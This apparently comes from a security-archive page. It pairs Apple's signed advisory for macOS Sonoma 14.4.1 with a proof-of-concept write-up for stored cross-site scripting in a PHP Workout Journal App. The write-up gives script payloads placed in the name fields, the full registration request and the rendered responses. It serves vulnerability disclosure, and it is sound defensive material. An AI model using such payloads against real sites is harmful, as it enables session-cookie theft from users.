Apple Security Advisory 03-25-2024-2 - macOS Sonoma 14.4.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-25-2024-2 macOS Sonoma 14.4.1

macOS Sonoma 14.4.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214096.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

CoreMedia  
Available for: macOS Sonoma  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

WebRTC  
Available for: macOS Sonoma  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

macOS Sonoma 14.4.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmYCPIQACgkQX+5d1TXa  
IvrgbRAAg4RSaUphmr+xku+UTKjqN9BQU8fRYd+5UsN1x2DGTznnh1CIJrLi9XdM  
SkvIz076B9mtB0wlL6E7YCW4on5GXnvRt8OclNBjstjaxUZoqqeT0fs7KrKCm1WV  
fX7qcbIXo73cwzA7j/VoOtDCQr0aXAjBJv4zoIOERwAXw/BwJa8i9VZCeQT3RJr7  
Ww1EhYxfT1/XJhVk2rlTXLOBdL4FetbMNfENt8SozkUBTtOmU3BZeRDZ08RWpTn8  
nh+PKzrwmo+ayY8UcPZPcnrhw1fP8div1CIJc2v1AGnwr1rAzEbucJS4oQheT8SR  
8RhIYUCllkWkHzNTvAOJFc1K4clLPcAu1SG1+K7QPcpXJbMsKAybUGl+GOGbqvO8  
Dm3RHGU8BFgWKTAqDwUGzOs0GdaS/fmpRms+S22HlHx0/Z9kFA3lXEqAiVcxpVq8  
6RPJQiYsp7UBRFlCMx0X5bwCCLSaPPaGgJbWTcx3EaVlOXvUGyHaLcwmZUzicGCu  
GP5GHBjHgINslfm/lYLbUX2BPtT+Sed9VYojNs1ehGSLazpwgFVElpSou0OytxaK  
7mxU+ABDC3L7vn8QBX8ofF1EH/g57CMTKQlJDdVmsDaBmtY/LkOeSay5Zmr3qHDf  
RUFjjsxZltBKwnCQJBbViMbqJKwSdsuhHPSmVxBV0HGY9xiWUqc=  
=W3BD  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-25-2024-2

Workout Journal App version 1.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Workout Journal App 1.0 - Stored XSS# Date: 12.01.2024# Exploit Author: MURAT CAGRI ALIS# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html># Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows / MacOS / Linux# CVE : CVE-2024-24050# DescriptionInstall and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php urlFor the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.# PoCRegister Request to /workout-journal/endpoints/add-user.phpPOST /workout-journal/endpoint/add-user.php HTTP/1.1Host: localhostContent-Length: 268Cache-Control: max-age=0sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/workout-journal/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vciConnection: closefirst_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-This request turn back 200 Code on ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:05:52 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Content-Length: 214Connection: closeContent-Type: text/html; charset=UTF-8                <script>                    alert('Account Registered Successfully!');                    window.location.href = 'http://localhost/workout-journal/';                </script>After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right./workout-journal/home.php RequestGET /workout-journal/home.php HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://localhost/workout-journal/endpoint/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1Connection: close/workout-journal/home.php ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:07:56 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 2791Connection: closeContent-Type: text/html; charset=UTF-8    <!DOCTYPE html>    <html lang="en">    <head>        <meta charset="UTF-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <title>Workout Journal App</title>                <link rel="stylesheet" href="./assets/style.css">                <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">        <style>            body {                overflow: hidden;            }        </style>    </head>    <body>        <div class="main">            <nav class="navbar navbar-expand-lg navbar-dark bg-dark">                <a class="navbar-brand ml-3" href="#">Workout Journal App</a>                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">                    <span class="navbar-toggler-icon"></span>                </button>                <div class="collapse navbar-collapse" id="navbarSupportedContent">                    <ul class="navbar-nav ml-auto">                    <li class="nav-item active">                        <a class="nav-link" href="./endpoint/logout.php">Log Out</a>                    </li>                </div>            </nav>            <div class="landing-page-container">                <div class="heading-container">                    <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>                    <p>What would you like to do today?</p>                </div>                <div class="select-option">                    <div class="read-journal" onclick="redirectToReadJournal()">                        <img src="./assets/read.jpg" alt="">                        <p>Read your past workout journals.</p>                    </div>                    <div class="write-journal" onclick="redirectToWriteJournal()">                        <img src="./assets/write.jpg" alt="">                        <p>Write your todays journal.</p>                    </div>                </div>            </div>        </div>                <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>                <script src="./assets/script.js"></script>    </body>    </html>

Tag

#mac